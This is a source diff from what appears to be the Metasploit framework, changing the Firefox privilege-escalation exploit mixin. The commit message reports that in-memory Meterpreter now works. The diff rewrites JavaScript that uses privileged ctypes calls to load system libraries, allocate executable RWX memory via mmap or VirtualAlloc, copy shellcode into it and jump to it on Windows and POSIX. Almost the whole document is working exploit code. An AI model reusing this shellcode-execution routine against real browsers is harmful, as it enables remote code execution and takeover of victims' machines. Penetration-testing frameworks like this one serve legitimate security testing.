All working now. In-memory meterpreter even.

lib/msf/core/exploit/remote/firefox_privilege_escalation.rb

@@ -15,30 +15,26 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
   # @return [String] javascript code containing the execShellcode() javascript fn
   def exec_shellcode_source
     %Q|
-      var execShellcode = function(shellcode) {
+      var execShellcode = function(shellcode, bytes) {
-        var LIBS = [
-          "C:\\\\WINDOWS\\\\system32\\\\user32.dll",
-          "/usr/lib/libSystem.B.dylib",
-          "libc.so.6",
-          "libc.so"
-        ];
-
         Components.utils.import("resource://gre/modules/ctypes.jsm");
-        var openLibs = function(libs) {
-          var i, lib;
-          for (i in libs) {
-            try {
-              lib = ctypes.open(libs[i]);
-              return lib;
-            } catch (e) {}
-          }
-        };
-
-        var lib = openLibs(LIBS);
-        if (!lib) throw new Error("Could not find lib in ["+LIBS+"]");
-
         var execPosix = function() {
           var RWX = 7, ANON_PRIVATE = 4098;
+          Components.utils.import("resource://gre/modules/ctypes.jsm");
+          var LIBS = [
+            "/usr/lib/libSystem.B.dylib",
+            "libc.so.6",
+            "libc.so"
+          ];
+
+          var i, lib;
+          for (i in LIBS) {
+            try {
+              lib = ctypes.open(LIBS[i]);
+              break;
+            } catch (e) {}
+          }
+          if (!lib) throw new Error("Could not find lib in ["+LIBS+"]");
+
           var mmap = lib.declare('mmap',
             ctypes.default_abi,   /* calling convention */
             ctypes.voidptr_t,     /* return type */
@@ -56,28 +52,21 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
             ctypes.voidptr_t,     /* src */
             ctypes.size_t         /* size to copy */
           );
-          var pthread_create = lib.declare('pthread_create',
+
-            ctypes.default_abi,   /* calling convention */
-            ctypes.int,           /* return type */
-            ctypes.voidptr_t,     /* buffer to store thread struct */
-            ctypes.voidptr_t,     /* NULL */
-            ctypes.voidptr_t,     /* fn ptr */
-            ctypes.voidptr_t      /* NULL */
-          );
           var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
           var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0);
-          var bytes = encodeURI(shellcode).split(/%..\|./).length - 1;
+          var cstr = ctypes.jschar.array()(shellcode);
-          memcpy(buff, ctypes.jschar.array()(shellcode), bytes);
+          //var bytes = ctypes.char.array()(shellcode).length-1;
+          memcpy(buff, cstr, bytes);
           /* there is probably a better way to do this */
           var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
           if (!m) throw new Error("Could not find address of buffer.");
-          var fn = ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16));
+          ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
-          //pthread_create(pthread_buff, )
         };
 
         var execWindows = function() {
           var RWX = 0x40, ANON_PRIVATE = 0x1000;
-          var VirtualAlloc = lib.declare('VirtualAlloc',
+          var VirtualAlloc = ctypes.open("Kernel32.dll").declare('VirtualAlloc',
             ctypes.winapi_abi,    /* calling convention */
             ctypes.voidptr_t,     /* return type */
             ctypes.voidptr_t,     /* start address (NULL here) */
@@ -85,22 +74,22 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
             ctypes.unsigned_long, /* alloc type */
             ctypes.unsigned_long  /* protection flags */
           );
-          var memcpy = lib.declare('memcpy',
+          var memcpy = ctypes.open("ntdll.dll").declare('memcpy',
             ctypes.winapi_abi,    /* calling convention */
             ctypes.voidptr_t,     /* return type */
             ctypes.voidptr_t,     /* dest */
             ctypes.voidptr_t,     /* src */
             ctypes.size_t         /* size to copy */
           );
-          var buff = VirtualAlloc(null, shellcode.length, WIN.ANON_PRIVATE, WIN.RWX);
+          var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX);
-          var bytes = encodeURI(shellcode).split(/%..\|./).length - 1;
+          var cstr = ctypes.jschar.array()(shellcode);
-          memcpy(buff, ctypes.jschar.array()(shellcode), bytes);
+          memcpy(buff, cstr, bytes);
           var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/);
           if (!m) throw new Error("Could not find address of buffer.");
-          ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
+          ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
         };
 
-        var i, errs = [], fns = [execPosix, execWindows];
+        var i, errs = [], fns = [execWindows, execPosix];
         for (i in fns) {
           try {
             fns[i](shellcode);
@@ -116,12 +105,13 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
   # @return [String] javascript source code that kicks off the execution of the payload
   # For a javascript payload, this simply returns the payload source
   # For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode
+  # foreverwhile"\xeb\xfe"
   def run_payload
     return payload.encoded if js_target?
     %Q|
       #{exec_shellcode_source}
-      var sc = unescape("#{Rex::Text.to_unescape("\xcc"+payload.encoded+"\xc3")}");
+      var sc = unescape("#{Rex::Text.to_unescape(payload.encoded)}");
-      execShellcode(sc);
+      execShellcode(sc, #{payload.encoded.bytes.to_a.length});
     |
   end